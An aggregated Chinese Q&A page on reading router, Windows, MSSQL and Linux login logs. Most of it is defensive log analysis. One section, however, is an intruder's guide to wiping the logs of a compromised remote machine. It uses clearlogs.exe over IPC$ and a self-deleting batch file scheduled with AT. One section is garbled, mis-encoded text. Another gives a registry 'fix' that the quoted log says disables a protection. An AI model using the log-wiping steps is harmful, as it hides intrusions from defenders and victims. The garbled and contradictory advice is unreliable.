1. h3c 路由器系統日誌有login error from of wrong user or password,是什麼意思
login error from of wrong user or password
翻譯為:用戶或密碼登錄錯誤
有人嘗試通過web或telnet 或console登錄交換機但未驗證成功
2. 關於什麼是「系統日誌」
系統日誌 通過手工很難清除. 這里介紹一個工具 clearlog.exe
使用方法:
Usage: clearlogs [\\computername] <-app / -sec / -sys>
-app = 應用程序日誌
-sec = 安全日誌
-sys = 系統日誌
a. 可以清除遠程計算機的日誌
** 先用ipc連接上去: net use \\ip\ipc$ 密碼/user:用戶名
** 然後開始清除: 方法
clearlogs \\ip -app 這個是清除遠程計算機的應用程序日誌
clearlogs \\ip -sec 這個是清除遠程計算機的安全日誌
clearlogs \\ip -sys 這個是清除遠程計算機的系統日誌
b.清除本機日誌: 如果和遠程計算機的不能空連接. 那麼就需要把這個工具傳到遠程計算機上面
然後清除. 方法:
clearlogs -app 這個是清除遠程計算機的應用程序日誌
clearlogs -sec 這個是清除遠程計算機的安全日誌
clearlogs -sys 這個是清除遠程計算機的系統罩?
安全日誌已經被清除.Success: The log has been cleared 成功.
為了更安全一點.同樣你也可以建立一個批處理文件.讓自動清除. 做好批處理文件.然後用at命令建立一個計劃任務. 讓自動運行. 之後你就可以離開你的肉雞了.
例如建立一個 c.bat
rem ============================== 開始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 結束
在你的計算機上面測試的時候 可以不要 @echo off 可以顯示出來. 你可以看到結果
第一行表示: 運行時不顯示窗口
第二行表示: 清除應用程序日誌
第三行表示: 清除安全日誌
第四行表示: 清除系統日誌
第五行表示: 刪除 clearlogs.exe 這個工具
第六行表示: 刪除 c.bat 這個批處理文件
第七行表示: 退出
用AT命令. 建立一個計劃任務. 這個命令在原來的教程裡面和雜志裡面都有. 你可以去看看詳細的使用方法
AT 時間 c:\c.bat
之後你就可以安全離開了. 這樣才更安全一點.
3. 系統日誌事件代碼分別代表啥意思
作為一個伺服器維護者,我的工作就是檢查日誌。今天我想和大家分享的不是上面的任何一個日誌,而是系統的管理日誌。在windows 2003系統中,在「開始」菜單「運行」中輸入「eventvwr」就可以打開事件查看器,不過一般我們是打開計算機管理,他包含了這個時間查看器,方便管理,在運行中輸入「compmgmt.msc」或者右擊我的電腦選擇「管理」就可以打開計算機管理。事件查看器 一般可以查看四類日誌,他們分別是「應用程序」,「internet explorer」,「安全性」和「系統」。
如圖
[attachment=1584]
對於「登陸/注銷」來說我們重點關注 「應用程序」和「系統」這2類,「登陸/注銷」這種行為一般發生在系統用戶和資料庫用戶,下面以一個例子來具體說明。
比如,我以administrator身份登陸3389埠的遠程終端,那麼日誌記錄一般為4條,同時發生。
這個審核是默認開啟的,如果想修改可以在運行中輸入gpedit.msc打開組策略,在計算機配置-windows設置-安全設置-本地策略-審核策略,即可看到對系統登陸時間的審核。
[attachment=1585]
此類日誌保存在「安全性」這一類中
復制代碼
事件類型: 審核成功
事件來源: Security
事件種類: 帳戶登錄
事件 ID: 680
日期: 2010-2-4
事件: 20:52:37
用戶: TAGggg-DDD3333\administrator
計算機: TAGggg-DDD3333
描述:
嘗試登錄的用戶: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
登錄帳戶: administrator
源工作站: TAGggg-DDD3333
錯誤代碼: 0x0
這個日誌是記錄嘗試登陸的用戶,比如你在登陸窗口測試用戶名和密碼的話,這里都會記載下載,如果你發現有不是系統用戶的記錄,那麼肯定是有人在猜你的用戶名了
復制代碼
事件類型: 審核成功
事件來源: Security
事件種類: 登錄/注銷
事件 ID: 552
日期: 2010-2-4
事件: 20:52:37
用戶: NT AUTHORITY\SYSTEM
計算機: TAGggg-DDD3333
描述:
使用明確憑據的登錄嘗試:
登錄的用戶:
用戶名: TAGggg-DDD3333$
域: WORKGROUP
登錄 ID: (0x0,0x3E7)
登錄 GUID: -
憑據被使用的用戶:
目標用戶名: administrator
目標域: TAGggg-DDD3333
目標登錄 GUID: -
目標伺服器名稱: localhost
目標伺服器信息: localhost
調用方進程 ID: 3224
源網路地址: 142.97.167.96
源埠: 53637
如果登陸成功,那麼將在這里記載,如果被人拿到了3389的賬號和密碼,那麼這里將記載ip和方式,很明顯這里是使用憑據登陸的。
復制代碼
事件類型: 審核成功
事件來源: Security
事件種類: 登錄/注銷
事件 ID: 528
日期: 2010-2-4
事件: 20:52:37
用戶: TAGggg-DDD3333\administrator
計算機: TAGggg-DDD3333
描述:
登錄成功:
用戶名: administrator
域: TAGggg-DDD3333
登錄 ID: (0x0,0x3B5BA)
登錄類型: 10
登錄進程: User32
身份驗證數據包: Negotiate
工作站名: TAGggg-DDD3333
登錄 GUID: -
調用方用戶名: TAGggg-DDD3333$
調用方域: WORKGROUP
調用方登錄 ID: (0x0,0x3E7)
調用方進程 ID: 3224
傳遞服務: -
源網路地址: 142.97.167.96
源埠: 53637
這條日誌最為重要,他有3個地方說明了登陸方式是遠程連接登陸桌面的,第一個地方是登錄方式為10,這種方式是遠程交互(RemoteInteractive),說明是通過終端服務、遠程桌面或遠程協助登陸的;第二個地方就是:登錄進程: User32 ,說明是調用了user32.exe進程來登陸的。 第三個地址我們在關注一下調用方進程ID,打開任務管理器,可以看到3224的進程是winlogen.exe,這3點都說明了這個日誌是遠程連接日誌
[attachment=1586]
復制代碼
事件類型: 審核成功
事件來源: Security
事件種類: 登錄/注銷
事件 ID: 576
日期: 2010-2-4
事件: 20:52:37
用戶: TAGggg-DDD3333\administrator
計算機: TAGggg-DDD3333
描述:
指派給新登錄的特殊許可權:
用戶名:
域:
登錄 ID: (0x0,0x3B5BA)
特權: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
這個日誌是說明給予登陸用戶的許可權。
好了,上面就是遠程登陸的日誌了。下面介紹關於mssql的登陸日誌。我將mssql的登陸日誌分為3類:普通用戶登陸,SA登陸和系統用戶登陸。
需要開啟sql server和windows身份驗證,審核全部。點擊mssql實例,右擊屬性,在「安全性」選項卡中選擇即可
[attachment=1587]
我們重點關注SA和系統用戶的登陸。
mssql的系統用戶的登陸日誌也保存在「安全性」這類日誌中,它的日誌和遠程登陸相似,主要區別在第三個日誌,比如
復制代碼
事件類型: 審核成功
事件來源: Security
事件種類: 登錄/注銷
事件 ID: 528
日期: 2010-2-4
事件: 21:50:34
用戶: TAGggg-DDD3333\administrator
計算機: TAGggg-DDD3333
描述:
登錄成功:
用戶名: administrator
域: TAGggg-DDD3333
登錄 ID: (0x0,0x48EF44)
登錄類型: 5
登錄進程: Advapi
身份驗證數據包: Negotiate
工作站名: TAGggg-DDD3333
登錄 GUID: -
調用方用戶名: TAGggg-DDD3333$
調用方域: WORKGROUP
調用方登錄 ID: (0x0,0x3E7)
調用方進程 ID: 444
傳遞服務: -
源網路地址: -
源埠: -
可以看到這個日誌的源網路地址和源埠為空。登錄類型為5,了解過windows登陸類型的知道這是以服務的方式來登陸的,登錄進程為Advapi ,是因mssql調用了LogonUser(管理員)(API call to LogonUser)」,從而產生了登錄事件,調用方進程ID為444即serverices.exe的進程,在看到這個日誌的最開始你可能會以為被入侵了,其實不然,當然每個情況不一樣,要具體分析,因為像黑洞的遠程登陸日誌應當也是這樣,他也是採用服務來登陸系統。我上面的這個mssql日誌比較特殊,因為我是調用administrator來啟動mssql的,而不是system,所以第一眼看到這個日誌感覺可能中招了的想法是正確的,請仔細勘察。
MSSQL的用戶登陸日誌都保存在「應用程序」中,普通網站所用資料庫用戶的登陸,一般為
復制代碼
事件類型: 信息
事件來源: MSSQLSERVER
事件種類: (4)
事件 ID: 17055
日期: 2010-2-4
事件: 21:41:06
用戶: N/A
計算機: TAGggg-DDD3333
描述:
18454:
用戶 'dbxxxxx' 登錄成功。連接: 非信任。
在系統用登陸mssql是在這里也會有記載
復制代碼
事件類型: 信息
事件來源: MSSQLSERVER
事件種類: (4)
事件 ID: 17055
日期: 2010-2-4
事件: 21:42:37
用戶: TAGggg-DDD3333\administrator
計算機: TAGggg-DDD3333
描述:
18453:
用戶 TAGggg-DDD3333\administrator' 登錄成功。連接: 信任。
可能同時還伴隨會產生這樣一個日誌
復制代碼
描述:
8128:
使用 'xplog70.dll' 版本 '2000.80.2039' 來執行擴展存儲過程 'xp_msver'。
一個返回有關伺服器的實際內部版本號的信息以及伺服器環境的有關信息的擴展存儲
下面說SA的日誌。
sa登陸成功日誌:
事件類型: 信息
復制代碼
事件來源: MSSQLSERVER
事件種類: (4)
事件 ID: 17055
日期: 2010-2-4
事件: 21:02:21
用戶: N/A
計算機: TAGggg-DDD3333
描述:
18454:
用戶 'sa' 登錄成功。連接: 非信任。
如果看到這樣的日誌那麼你的小心了,SA密碼已經被人拿去了。
如果執行游覽文件功能,那麼會產生這樣的日誌
復制代碼
事件類型: 信息
事件來源: MSSQLSERVER
事件種類: (2)
事件 ID: 17055
日期: 2010-2-4
事件: 21:02:45
用戶: N/A
計算機: TAGggg-DDD3333
描述:
8128:
使用 'xpstar.dll' 版本 '2000.80.2039' 來執行擴展存儲過程 'xp_dirtree'。
4. linux緋葷粺涓涓庣敤鎴風櫥褰曠浉鍏崇殑鏃ュ織鏂囦歡鏈
鍦↙inux緋葷粺涓錛屼笌鐢ㄦ埛鐧誨綍鐩稿叧鐨勬棩蹇楁枃浠朵富瑕佹湁浠ヤ笅鍑犱釜錛
1.`/var/log/auth.log`錛榪欎釜鏂囦歡璁板綍浜嗙郴緇熶笂鎵鏈夌殑鐢ㄦ埛鐧誨綍浜嬩歡錛屽寘鎷灝濊瘯鐧誨綍鍜屾垚鍔熺殑鐧誨綍銆傚畠鍖呭惈浜嗙敤鎴瘋緭鍏ョ殑鐢ㄦ埛鍚嶃両P鍦板潃銆佺櫥褰曟椂闂寸瓑淇℃伅銆傝繖涓鏂囦歡涓昏佺敤浜庣郴緇熺$悊鍛樺垎鏋愮敤鎴風殑鐧誨綍琛屼負錛屼互媯嫻嬪彲鑳界殑闈炴硶鐧誨綍鎴栨伓鎰忚屼負銆
2./var/log/secure錛氳繖涓鏂囦歡鍦ㄦ煇浜汱inux鍙戣岀増涓瀛樺湪錛屽畠鎻愪緵浜嗕笌瀹夊叏鐩稿叧鐨勭櫥褰曟棩蹇椾俊鎮錛屼緥濡傚瘑鐮佷涪澶便佽處鎴瘋В閿佺瓑浜嬩歡銆備笉榪囬渶瑕佹敞鎰忕殑鏄錛岃繖涓鏂囦歡鐨勫唴瀹瑰彲鑳戒細鍥犱負涓嶅悓鐨勫彂琛岀増鍜岄厤緗鏈夋墍涓嶅悓銆
3./var/log/messages錛鍦ㄦ煇浜汱inux鍙戣岀増涓錛/var/log/messages鏂囦歡涔熺敤浜庤板綍鐢ㄦ埛鐧誨綍浜嬩歡銆備笌/var/log/auth.log綾諱技錛屽畠涔熷寘鍚浜嗙敤鎴風櫥褰曠殑鐩稿叧淇℃伅錛屽傜敤鎴峰悕銆両P鍦板潃絳夈
榪欎簺鏃ュ織鏂囦歡閫氬父鐢辯郴緇熷畧鎶よ繘紼嬶紙濡俛uthlog鎴杝ecure錛夎嚜鍔ㄨ板綍錛屽苟瀹氭湡鍐欏叆鍒扮佺洏涓銆傝繖浜涙棩蹇楁枃浠跺逛簬緋葷粺綆$悊鍛樺拰瀹夊叏涓撳舵潵璇撮潪甯擱噸瑕侊紝鍥犱負浠栦滑鍙浠ヤ粠涓鑾峰彇鏈夊叧緋葷粺瀹夊叏鎬х殑閲嶈佷俊鎮錛屼緥濡傛槸鍚﹀瓨鍦ㄦ湭緇忔巿鏉冪殑鐧誨綍灝濊瘯銆佹槸鍚﹀瓨鍦ㄥ瘑鐮佹硠闇茬瓑銆
5. WINDOWS 操作系統非法關機如何通過系統日誌查看
事件查看器相當於操作系統的保健醫生,查看應用程序、安全性和系統日誌,查看是否存在非法登錄、系統是否非正常關機、程序執行錯誤等信息,通過查看事件屬性來判定錯誤產生的來源和解決方法,使操作系統和應用程序正常工作。本文介紹了事件查看器的一些相關知識,最後給出了一個安全維護實例,對安全維護人員維護系統有一定的借鑒和參考。
(一)事件查看器相關知識
1.事件查看器
事件查看器是 Microsoft Windows 操作系統工具,事件查看器相當於一本厚厚的系統日誌,可以查看關於硬體、軟體和系統問題的信息,也可以監視Windows 操作系統中的安全事件。有三種方式來打開事件查看器:
(1)單擊「開始」-「設置」-「控制面板」-「管理工具」-「事件查看器」,開事件查看器窗口
(2)在「運行」對話框中手工鍵入「%SystemRoot%\system32\eventvwr.msc /s」打開事件查看器窗口。
(3)在運行中直接輸入「eventvwr」或者「eventvwr.msc」直接打開事件查看器。
2.事件查看器中記錄的日誌類型
在事件查看器中一共記錄三種類型的日誌,即:
(1)應用程序日誌
包含由應用程序或系統程序記錄的事件,主要記錄程序運行方面的事件,例如資料庫程序可以在應用程序日誌中記錄文件錯誤,程序開發人員可以自行決定監視哪些事件。如果某個應用程序出現崩潰情況,那麼我們可以從程序事件日誌中找到相應的記錄,也許會有助於你解決問題。
(2)安全性日誌
記錄了諸如有效和無效的登錄嘗試等事件,以及與資源使用相關的事件,例如創建、打開或刪除文件或其他對象,系統管理員可以指定在安全性日誌中記錄什麼事件。默認設置下,安全性日誌是關閉的,管理員可以使用組策略來啟動安全性日誌,或者在注冊表中設置審核策略,以便當安全性日誌滿後使系統停止響應。
(3)系統日誌
包含Windows XP的系統組件記錄的事件,例如在啟動過程中載入驅動程序或其他系統組件失敗將記錄在系統日誌中,默認情況下Windows會將系統事件記錄到系統日誌之中。 如果計算機被配置為域控制器,那麼還將包括目錄服務日誌、文件復制服務日誌;如果機子被配置為域名系統(DNS)伺服器,那麼還將記錄DNS伺服器日誌。當啟動Windows時,「事件日誌」服務(EventLog)會自動啟動,所有用戶都可以查看應用程序和系統日誌,但只有管理員才能訪問安全性日誌。
在事件查看器中主要記錄五種事件,事件查看器屏幕左側的圖標描述了 Windows 操作系統對事件的分類。事件查看器顯示如下類型的事件:
(1)錯誤:重大問題,例如數據丟失或功能損失。例如,如果服務在啟動期間無法載入,便會記錄一個錯誤。
(2)警告:不一定重要的事件也能指出潛在的問題。例如,如果磁碟空間低,便會記錄一個警告。
(3) 信息:描述應用程序、驅動程序或服務是否操作成功的事件。例如,如果網路驅動程序成功載入,便會記錄一個信息事件。
(4)成功審核:接受審核且取得成功的安全訪問嘗試。例如,用戶對系統的成功登錄嘗試將作為一個「成功審核」事件被記錄下來。
(5)失敗審核:接受審核且未成功的安全訪問嘗試。例如,如果用戶試圖訪問網路驅動器但未成功,該嘗試將作為「失敗審核」被記錄下來。
(二)維護伺服器安全實例
1.打開並查看事件查看器中的三類日誌
在「運行」中輸入「eventvwr.msc」直接打開事件查看器,在該窗口中單擊「系統」,單擊窗口右邊的類型進行排序,可以看到類型中有警告、錯誤等多條信息。
2.查看系統錯誤記錄詳細信息
選擇「錯誤」記錄,雙擊即可打開並查看事件的屬性,如圖2所示,可以發現該事件為一個攻擊事件,其事件描述為:
連接自 211.99.226.9 的一個匿名會話嘗試在此計算機上打開一個 LSA 策略句柄。嘗試被以 STATUS_ACCESS_DENIED 拒絕, 以防止將安全敏感的信息泄露給匿名呼叫者。
進行此嘗試的應用程序需要被更正。請與應用程序供應商聯系。 作為暫時的解決辦法,此安全措施可以通過設置: \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TurnOffAnonymousBlock DWORD 值為 1 來禁用。 此消息將一天最多記錄一次。
說明:該描述信息表明IP地址為「211.99.226.9」的計算機在攻擊此伺服器。
3.根據提示修補系統漏洞
根據描述信息,直接打開注冊表編輯器,依次層層展開找到鍵值「HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TurnOffAnonymous」新建一個DWORD 的 「TurnOffAnonymousBlock Block DWORD」 鍵,並設置其值為「 1」,。
說明:如果在事件屬性中未給出解決方案,除了在google中尋找解決方法外,還可以對錯誤信息進行追蹤,以找到合適的解決方法,一般有兩種方式:
(1)微軟知識庫。微軟知識庫的文章是由微軟公司官方資料和微軟MVP撰寫的技術文章組成,主要解決微軟產品的問題及故障。當微軟每一個產品的Bug和容易出錯的應用點被發現後,都將有與其對應的KB文章分析這項錯誤的解決方案。微軟知識庫的地址是:http://support.microsoft.com,在網頁左邊的「搜索(知識庫)」中輸入相關的關鍵字進行查詢,事件發生源和ID等信息。當然,輸入詳細描述中的關鍵詞也是一個好辦法,如果日誌中有錯誤編號,輸入這個錯誤編號進行查詢。
(2)通過Eventid.net網站來查詢
要查詢系統錯誤事件的解決方案,其實還有一個更好的地方,那就是Eventid.net網站地址是:http://www.eventid.net。這個網站由眾多微軟MVP(最有價值專家)主持,幾乎包含了全部系統事件的解決方案。登錄網站後,單擊「Search Events(搜索事件)」鏈接,出現事件搜索頁面。根據頁面提示,輸入Event ID(事件ID)和Event Source(事件源),並單擊「Search」按鈕。Eventid.net的系統會找到所有相關的資源及解決方案。最重要的是,享受這些解決方案是完全免費的。當然,Eventid.net的付費用戶則能享受到更好的服務,比如直接訪問針對某事件的知識庫文章集等。
4.多方復查
既然出現了LSA的匿名枚舉,那麼一定會存在登錄信息,如圖4所示,單擊「安全性」查看事件屬性,先針對「審核失敗」進行查看,可以看到IP地址「211.99.226.9」的多次連接失敗的審核信息。需要特別注意的是,事件查看器中記錄的日誌必須先在安全策略中進行設置,默認情況下不記錄,只要啟用審核以後才記錄。然後依次查看審核成功的登錄記錄,如果發現該IP地址登錄成功,那麼還需要對系統進行徹底的安全檢查,包括修改登錄密碼,查看系統時候被攻擊者留下了後門。在本例中主要事件就是IP地址為211.99.226.9的伺服器在進行密碼攻擊掃描,根據事件屬性中提供的策略進行設置後,即可解決該匿名枚舉的安全隱患。
6. windows有三種類型的事件日誌分別是
Windows有三種類型的事件日誌分別是:應用程序日誌、安全日誌和系統日誌。
1. 應用程序日誌:
這些日誌主要記錄由應用程序或程序組件生成的事件。例如,如果某個應用程序崩潰或出現錯誤,相關信息會被記錄在應用程序日誌中。
通過查看這些日誌,管理員或用戶可以了解某個應用程序的運行狀態,是否出現了錯誤,以及錯誤的詳細信息。
例如,當Microsoft Office應用程序發生錯誤並顯示錯誤對話框時,該錯誤的相關信息也可能同時被記錄在應用程序日誌中。
2. 安全日誌:
安全日誌專注於記錄與系統安全相關的事件,如用戶登錄嘗試、許可權更改、文件或目錄的訪問等。
這些日誌對於檢測潛在的安全威脅或未經授權的訪問嘗試至關重要。例如,如果有人嘗試使用錯誤的密碼多次登錄系統,這樣的嘗試會被記錄在安全日誌中。
通過分析這些日誌,管理員可以識別出異常行為或潛在的安全風險,並採取相應的措施。
3. 系統日誌:
系統日誌記錄與Windows操作系統本身相關的事件,如驅動程序的載入、系統服務的啟動或停止、系統錯誤等。
這些日誌對於診斷系統級問題或了解系統的運行狀態非常有用。例如,如果Windows在啟動時遇到問題,相關的錯誤信息可能會被記錄在系統日誌中。
通過查看系統日誌,管理員可以對系統的穩定性和健康狀況有一個全面的了解。
總之,Windows的事件日誌提供了一個寶貴的資源,用於了解系統的運行狀態、診斷問題以及檢測潛在的安全風險。通過定期查看和分析這些日誌,管理員可以採取適當的措施來確保系統的穩定和安全。